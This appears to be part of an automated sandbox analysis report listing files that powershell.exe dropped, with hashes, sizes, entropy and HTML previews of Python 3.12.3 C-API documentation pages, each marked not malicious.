    SSDEEP:
    MD5:5340186F78D90746313F4626B2C9609F
    SHA1:D33204253F9C5DAFFD322D19B978A362B116D7BB
    SHA-256:18540D4DE6E149F274A359865D7A13BC10ABC27475F8EF4A7892DED61A0D2F51
    SHA-512:AF2960E2A3589DB72507EAD4ABADE99EE8E1D833587F17F6B2CC209B19B8A4096E18E0CFDAA8CAAC0CF9B8D97AC27F56C1CB11C7B76B5C1AA403B2BF54F05B1A
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Number Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/number.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Number Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="..
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1198), with CRLF line terminators
    Category:dropped
    Size (bytes):22448
    Entropy (8bit):4.887100931867726
    Encrypted:false
    SSDEEP:
    MD5:C673B4DE41142E7D613D46C1BA601298
    SHA1:B889C5A288541C989F1C4826C5087BDB135763D2
    SHA-256:97CF60328DA673BF415E58E6992CF9A51887333EEB014017FCABC8FCEA6272ED
    SHA-512:7E1B864AFC10B4D9843ACBC43D3BB63DDC522407A65A1D2C0E769284CBC14617CE7CA9C7295CBE96DD9527AD8DFFD2C691CA671700CE0194C25A45F643D9ECF9
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Old Buffer Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/objbuffer.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions were part of the .old buffer protocol. API in Python 2. In Python 3, this protocol doesn.t exist anymore but the functions are still exposed to ease porting 2.x code. They act as a ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions were part of the .old buffer protocol
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1154), with CRLF line terminators
    Category:dropped
    Size (bytes):97068
    Entropy (8bit):4.82427893690913
    Encrypted:false
    SSDEEP:
    MD5:41E5F97493467FF20C47A63598EA5275
    SHA1:1E93BF9C4A86958FFF106C5A69B4B1F9718B89C5
    SHA-256:885BFF9F047F1C62A4ECBD748485149AF7C732A0D9C415AE3C7500783D719C87
    SHA-512:BBA88DB58A6B783018A8338DD37AEA8B4321BEA9A36D4743AC2713F9863FF5AF50C7AF3CC866089CDDC33700678A472556193E411D49A3C1D67F48339803BE19
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Object Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/object.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Object Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="..
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):16752
    Entropy (8bit):4.87449704964025
    Encrypted:false
    SSDEEP:
    MD5:F320520FDA975A75D63F07C76CC1BEB5
    SHA1:3A988D6AC5F1042661E8789C7633B21313B8875F
    SHA-256:A7E9A61705984E694631DA4C100E17FDBFFA1CFF45309E3B4A9E5E192F404279
    SHA-512:8A5F8B56479768D4564530FDC60E2D0DEFEA6D6369827A58FC1F04E39EA28962E21431276B03190D27190531C4D588F0C98DDE9247D4DEE23547A60C2FC5CBE6
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Object Implementation Support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/objimpl.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter describes the functions, types, and macros used when defining new object types. Allocating Objects on the Heap, Common Object Structures- Base object types and macros, Implementing fun..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter describes the functions, types, and macr
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1103), with CRLF line terminators
    Category:dropped
    Size (bytes):20192
    Entropy (8bit):4.876514973239937
    Encrypted:false
    SSDEEP:
    MD5:892CDF2046EF215A1FAC2673C4FB0A30
    SHA1:0EC0487BE38A111753FE76B5120C129CFD25170A
    SHA-256:EFFD231F6EB7EF78C9F845A5777835351AFA1863A8371100A62391EA7F7265E1
    SHA-512:E3306C1A10724152CA5723FD300A44EC0B2B0F91B59222296B37D8332AAD8EA988DE29472BCE3876A9F64E649DC5446C4803843521DD23DB626E1057DEC13287
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Support for Perf Maps" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/perfmaps.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="On supported platforms (as of this writing, only Linux), the runtime can take advantage of perf map files to make Python functions visible to an external profiling tool (such as perf). A running pr..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="On supported platforms (as of this writing, only Linux), the
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (820), with CRLF line terminators
    Category:dropped
    Size (bytes):37929
    Entropy (8bit):4.941077785140546
    Encrypted:false
    SSDEEP:
    MD5:8801BA977A599E84FC2686704210D098
    SHA1:95D582C907A192417AF6D3E6AC44A5B55A569EF7
    SHA-256:DC6FC615F63CC64E126FD2F503F6E6BCC2B31CF06DDF6CCD596FE913933D8E85
    SHA-512:3441189F423C53BF78C4C1F6C6FF85886C0FE0F28FD9DFE0092E06BA35BC453CDA5DF1010367DFA64ACA805DFB8BCA3E57332602399887E79C94DEC5EDB0C580
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Reference Counting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/refcounting.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions and macros in this section are used for managing reference counts of Python objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions and macros in this section are used for managing reference counts of Python objects." />..<meta property="og:image:width" content="200" />..<meta pr
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (737), with CRLF line terminators
    Category:dropped
    Size (bytes):19346
    Entropy (8bit):4.8923699527530315
    Encrypted:false
    SSDEEP:
    MD5:F7EF7EF6A74A0D74ABCA752FE436B98B
    SHA1:23F6A8DDD4C889BD379FE08787BB8FE8EEB9A557
    SHA-256:D0CBB213F455E06CAB33EC2E2C8D219FE8ACFA95BC61C48A571DB37A3073FCAC
    SHA-512:7B7A8D429E5F81CB2B8BA6476FAFE19853B1FDA3655E1756ED6C201DE44F60C6B457CF3FABA0068F1C09234DA8371E44754149074FE66BDEED0EE0180A048FD9
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Reflection" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/reflection.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Reflection &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_stat
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1310), with CRLF line terminators
    Category:dropped
    Size (bytes):50587
    Entropy (8bit):4.837412214825317
    Encrypted:false
    SSDEEP:
    MD5:56B339BDF0E0710A6F053DCAA7EE3379
    SHA1:C64E6C91A1E7E651ABB29057828D2A484CB29D3F
    SHA-256:001178FF662655D87AD524018C5CFF292F764AF06549720D01603CCB8306BB8A
    SHA-512:4A5CB6C98BEF458483A3B79A8BFE9ECAB885EEBD1FD2EA8A5993F282F3262A136734BE1F27637E966344FD49F966A550D6778A8BFEF249640502BFC2D9487824
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Sequence Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/sequence.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Sequence Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" hr
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (871), with CRLF line terminators
    Category:dropped
    Size (bytes):46531
    Entropy (8bit):4.856628859617243
    Encrypted:false
    SSDEEP:
    MD5:FE67269735076CAE68EDBC4708AA18E1
    SHA1:CB90E3218E15928762159DD2F266BA2842ABF880
    SHA-256:F0252DF1FD4F4EE6D464D5DBC86443775BF53B009BA68059BF322D8F5423CEC9
    SHA-512:D05F3A1B89ABCF3C6D4054E1997D15CD14101300976BAD4FCF948E051A17C5A9ECBEDCBEBC646B793D70338931F5E618BA03E7DF341BA906637BA67DFF3EA7BC
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Set Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/set.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section details the public API for set and frozenset objects. Any functionality not listed below is best accessed using either the abstract object protocol (including PyObject_CallMethod(), Py..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section details the public API for set and frozenset objects. Any func
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1921), with CRLF line terminators
    Category:dropped
    Size (bytes):34047
    Entropy (8bit):4.853956486974159
    Encrypted:false
    SSDEEP:
    MD5:2E0D0C93BDD2E75929C0608F86EA28B1
    SHA1:F92ADF9637D55271BD6D1C922CCBE3A32DB4F8BA
    SHA-256:14AF15EAFB663F5B5B410241127B2AB690013F4A170AAC66DE6AB7C16D54D581
    SHA-512:1D9A3BC98692C3E34853DEE1495CCD0F4CDC27A6DE151BD7555094238A96247668118A4CBC321A63AAFD845EBB1C1E5762A7F5F7E5442A03231E96CC614D02F4
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Slice Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/slice.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Ellipsis Object:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Ellipsis Object:" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Slice Objects &#8212; Python 3.12.3 documentation</title><meta name="vie
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):216651
    Entropy (8bit):4.945773715411537
    Encrypted:false
    SSDEEP:
    MD5:FAAFD331831E731EF870F66FC20E3534
    SHA1:CC747DFC2E1E77BD9CC020153C4085AFEFE6EC22
    SHA-256:A1ACEA40C3400101897739250C069276C5887C68003D4E4B83D0CE5C5BF8D773
    SHA-512:6C3DCE897D7EAB4164106CD4D199E308EFF779A721F352A0957D00D82F8C030C2F4B57F551060464BFFB061C4E5A816BEC32DF9903B933E20C8DE9350758CF28
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="C API Stability" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/stable.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Unless documented otherwise, Python.s C API is covered by the Backwards Compatibility Policy, PEP 387. Most changes to it are source-compatible (typically by only adding new API). Changing existing..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Unless documented otherwise, Python.s C API is covered by the Ba
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1496), with CRLF line terminators
    Category:dropped
    Size (bytes):113548
    Entropy (8bit):4.929874763710125
    Encrypted:false
    SSDEEP:
    MD5:9ABBDC5E3742403F862988733EAD2B3C
    SHA1:3C0EBF8E7AF992DE4DB58219726EA24058C60BB3
    SHA-256:1A63D770BB8AA39C9C2F88171C310DE718BC846011CAB7D87AFE10F6C4C6C6A2
    SHA-512:98FFF4848287986D5A1F844FB5966A88431DCFE7B376F470E3E9C51F0EB648FFA73D0B0CEDEB159243653A868C0EB53A3442D4E8B80ECD7D6EAFD3DF9F2FB861
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Common Object Structures" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/structures.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a large number of structures which are used in the definition of object types for Python. This section describes these structures and how they are used. Base object types and macros: All ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a large number of structures which are used i
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (898), with CRLF line terminators
    Category:dropped
    Size (bytes):79043
    Entropy (8bit):4.8711381767546555
    Encrypted:false
    SSDEEP:
    MD5:F4CCB9ED00E2D61D27F2BDD4E434E515
    SHA1:4681BF68370555AD68AAC84487DA452CF36B3BA7
    SHA-256:A7E54EFC78C5B315B14FDE70C6EDA1E0719B4F774A17B56E4C84073279CBC10C
    SHA-512:BEFF0A532F1AED814EE20EDB3C7CFB1300E4D13521A08DEE7F3A5E35822225831514BE5F8FE84F5824F743CD020FAF54585026804F97254DDA74C11C7838B225
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Operating System Utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/sys.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="System Functions: These are utility functions that make functionality from the sys module accessible to C code. They all work with the current interpreter thread.s sys module.s dict, which is conta..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="System Functions: These are utility functions that make
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1180), with CRLF line terminators
    Category:dropped
    Size (bytes):52632
    Entropy (8bit):4.871431107434751
    Encrypted:false
    SSDEEP:
    MD5:C684B2237C0B7ADA7F050ED1B7DA16F2
    SHA1:8295D38C76B771E690720E2D7FE5BB4146480FC8
    SHA-256:29D23A0F8D5D705337017D034E3F2B5073B1883E8748C9093453593E6FF17DDB
    SHA-512:3EA61BF79C678430A3E479702CCB7CC4FC1C2B21F246EAD21977DDB5B1249DA3852C6D7B147142784D47CC515075EF8F448D51DBE977A665715237C163DE12AF
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Tuple Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/tuple.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Struct Sequence Objects: Struct sequence objects are the C equivalent of namedtuple() objects, i.e. a sequence whose items can also be accessed through attributes. To create a struct sequence, you ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Struct Sequence Objects: Struct sequence objects are the C equivalent o
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1555), with CRLF line terminators
    Category:dropped
    Size (bytes):87609
    Entropy (8bit):4.899854761834203
    Encrypted:false
    SSDEEP:
    MD5:03E6320EAD2EDFDB2D1D8D1C435F8249
    SHA1:3A06EF1520A569D0806F5D18308E8B887753DFD1
    SHA-256:63299C41D318DB31A58747D432AAA0BB3D4202A1DD1AE862C62B699B82725149
    SHA-512:D5B3F2142C051E89F986B60DC6A0A6683ED6DD78841D3B055AE468D585EC637904F34D531FAA83851E0127519DBB306B10D5AD2FCB165798DAD88D1D0261DB17
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Type Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/type.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Creating Heap-Allocated Types: The following functions and structs are used to create heap types." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Creating Heap-Allocated Types: The following functions and structs are used to create heap types." />..<meta property="og:image:width" content="200" />..<meta property="og:imag
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1012), with CRLF line terminators
    Category:dropped
    Size (bytes):19681
    Entropy (8bit):4.888008295385176
    Encrypted:false
    SSDEEP:
    MD5:96DA513204CD642D3BF574532FFEEF2C
    SHA1:E5D882FC0A4537060A0AC8F0D4C5081765593F37
    SHA-256:6D657B7383A490E96DAC6F05EAF5F29244F26EBAEB4FECE75590111E1BFB58AB
    SHA-512:A045107ED428463F94A3142C8DA23DDCC639592625DB3863ACEAFC0306A42B6EA81C3CBF47500C91C6FC2DA5D2A252BA21A583FBA36BF881EEA4CC9306757453
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Objects for Type Hinting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/typehints.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Various built-in types for type hinting are provided. Currently, two types exist . GenericAlias and Union. Only GenericAlias is exposed to C." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Various built-in types for type hinting are provided. Currently, two types exist . GenericAlias and Union. Only
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):450266
    Entropy (8bit):4.8522974087846835
    Encrypted:false
    SSDEEP:
    MD5:B98E16C9AED455FB6A0FBB3F815FC48D
    SHA1:D29B1E353F93225F32FFD7D948DF0F6958532D56
    SHA-256:D107CE6C88B068E3CE2BD45C94EA042AE714676E940464696114FE5430F22B3F
    SHA-512:52919BF8FD93554FF0DBD731B5E47F9DB5BF69B8B88A9F980024CD803D59D8FCB71D936651C1D558AC59D46A3505502B878B04BA5AEE18661AF50194B756F66D
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Type Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/typeobj.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Perhaps one of the most important structures of the Python object system is the structure that defines a new type: the PyTypeObject structure. Type objects can be handled using any of the PyObject_..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Perhaps one of the most important structures of the Python object syst
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1103), with CRLF line terminators
    Category:dropped
    Size (bytes):246175
    Entropy (8bit):4.845466352850264
    Encrypted:false
    SSDEEP:
    MD5:421072F86D15E1CAAA6AE18984F61D5D
    SHA1:625E1979886209883F9DA8F81C26B704A8B90A75
    SHA-256:5D0739EBD4E5FBC5E1150F7F464ADABF3275518477CEFA4E6CD52651C03141C2
    SHA-512:D2D075ECB275FCEA02F58E6D3D169B6749511B33038412561140E8F32A71FC4DD8A1344F765225591E5905FB4C7B3D48BCD03BE1D57F314AE6F19F46FDDDFA4F
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Unicode Objects and Codecs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/unicode.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Unicode Objects: Since the implementation of PEP 393 in Python 3.3, Unicode objects internally use a variety of representations, in order to allow handling the complete range of Unicode characters ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Unicode Objects: Since the implementation of PEP 393 in
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):15210
    Entropy (8bit):4.832592879852463
    Encrypted:false
    SSDEEP:
    MD5:7B50A2F62CBD22DC5C37A9F5297D4C30
    SHA1:BA14C7B61EACB945CDD3BDA0C4C421E704D231A5
    SHA-256:3787A4F4BEB8F2EFC0C8F838F2C530A4C1FE822B52BDB47CBB117377B1BF4A0D
    SHA-512:CDC4023F2E9B6893A2A9C452E0C014450C3A94FD0213132A0208743E7818C16890D5E693239EC2BE9ED0568FADCA46889435AB87855BD2D84E00617FCCBA63EA
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/utilities.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter perform various utility tasks, ranging from helping C code be more portable across platforms, using Python modules from C, and parsing function arguments and construct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter perform various utility tasks, ranging fr
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1996), with CRLF line terminators
    Category:dropped
    Size (bytes):87602
    Entropy (8bit):4.787656783462618
    Encrypted:false
    SSDEEP:
    MD5:B48AE78A5C650CCEB1B2212D283E5DA0
    SHA1:1B81E91073965B724874F19DE539CBC1CC8657D0
    SHA-256:CE7F7E170F5ECAF6DF8F77AC02CFADF87345DF890AC8694A84484D7C1C8AF395
    SHA-512:54B64669CFCEE2EA30392D663FBE16A6A961E87929D3033F6DC544EB417898B0D0E93E441A5A92139D7D5957716E497D527A1063C05AB8FDA53D045B0920C7A5
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The Very High Level Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/veryhigh.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter will let you execute Python source code given in a file or a buffer, but they will not let you interact in a more detailed way with the interpreter. Several of these f..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter will let you execute Pytho
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1018), with CRLF line terminators
    Category:dropped
    Size (bytes):25026
    Entropy (8bit):4.891239863417193
    Encrypted:false
    SSDEEP:
    MD5:2AD8969F499B66CEEA60FBA429CB540B
    SHA1:72B18825F40439BADE47DF7C526FB4A5B9E051B8
    SHA-256:282BC6B2421078AE2E2D7374B05556FDCC8C410EEC97524DA6E37ACCBA1E18DD
    SHA-512:081E97E083A42BB0C8936C5E94E0AB81045B0766E1B47FB378ED38270094D09EE7888F7353F9259019540FDC74E21EA6AB22AF03D5736A4110C75ECBD7A1DA86
    Malicious:false
    Reputation:unknown
